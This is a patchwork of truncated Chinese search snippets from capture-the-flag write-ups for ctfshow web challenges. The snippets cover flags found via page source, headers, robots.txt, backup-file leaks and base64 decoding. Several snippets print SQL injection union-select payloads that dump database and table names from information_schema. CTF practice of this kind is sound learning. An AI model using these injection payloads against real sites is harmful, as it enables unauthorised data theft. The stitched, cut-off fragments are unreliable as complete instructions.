admin' or '1'='1' union select 1,2,3# 由上可知:回显位为2所在位置 爆库:admin' or 1=1 union select 1,database(),3#可知数据库名为web2 爆表:admin' or '1'='1' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database();#可知表名为fl...
1' or 1=1 union select 1,database(),3# 这里我们爆出数据库名:web2 第四步我们开始爆数据库web2里面的表名: sql 1' or 1=1 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='web2'# 这里我们爆出两个表名:flag和user 这里我们就可以知道我们要的fla...
CTFshow web1(困难题)根据前面做题经验,看见登录框基本都是跑一下爆破,弱口令等等这里用 dirmap 目录爆破爆出来有一个 www.zip把他下载下来看了login.php 和 reg.php两个文件的源码都对sql注入常见的字符做了严格的过滤,sql注入此路不通看了下 main.php 看起来是一个显示用户信息的页面。
第一题很简单 就是一个base64编码 我们打开开发者模式看源代码 Y3Rmc2hvd3s1MGMyZDdkYS1lOWZjLTQ5YzItYTRjZC1iZmJmZjIyYmI4NWV9将这段话base64解码就拿到flag了
Ctfshow-Web信息搜集(Web1-20) web1 源代码 打开链接即使源代码,直接get flag web2 js前台拦截 它不让我看源代码,我就打开firefox,Fn+F12查看源代码获得flag web3 头 打开题目是这样 查看源代码,没东西,F12截包查看消息头发现flag we
当备份文件或者修改过程中的缓存文件因为各种原因而被留在网站 web 目录下,而该目录又没有设置访问权限时,便有可能导致备份文件或者编辑器的缓存文件被下载,导致敏感信息泄露,给服务器的安全埋下隐患。 该漏洞的成因主要有是管理员将备份文件放在到 web 服务器可以访问的目录下。
web1# 直接F12找到flag web3# 使用开发者工具中的network功能 在返回包的response headers中找到flag 或者使用burpsuite抓包 # web4# 常规文件 根据提示访问robots.txt web5# 根据提示是源码泄露 访问url/index.phps下载备份文件 用记事本打开 web6#
1. 访问后即可获得flag web3 右键源码也没看到信息,去查看一下请求头和响应头,在响应头这里找到flag web4 题目提示robots,所以我们直接访问http://c6f215bf-6c3e-4a21-949b-1c37d603ca56.chall.ctf.show/robots.txt 然后根据提示,再访问flagishere.txt,即可得到flag ...
web1-7 一、代码 ctf.show萌新计划web1 <?php # 包含数据库连接文件 include("config.php"); # 判断get提交的参数id是否存在 if(isset($_GET['id'])){ $id = $_GET['id']; # 判断id的值是否大于999 if(intval($id) > 999){ # id 大于 999 直接退出并返回错误 die("id error");...
ctfshow web web1 ctfshow web web1 打开过后发现只有图中的一句话 直接查看页面源代码,发现一串MD5加密的东西 直接解码即可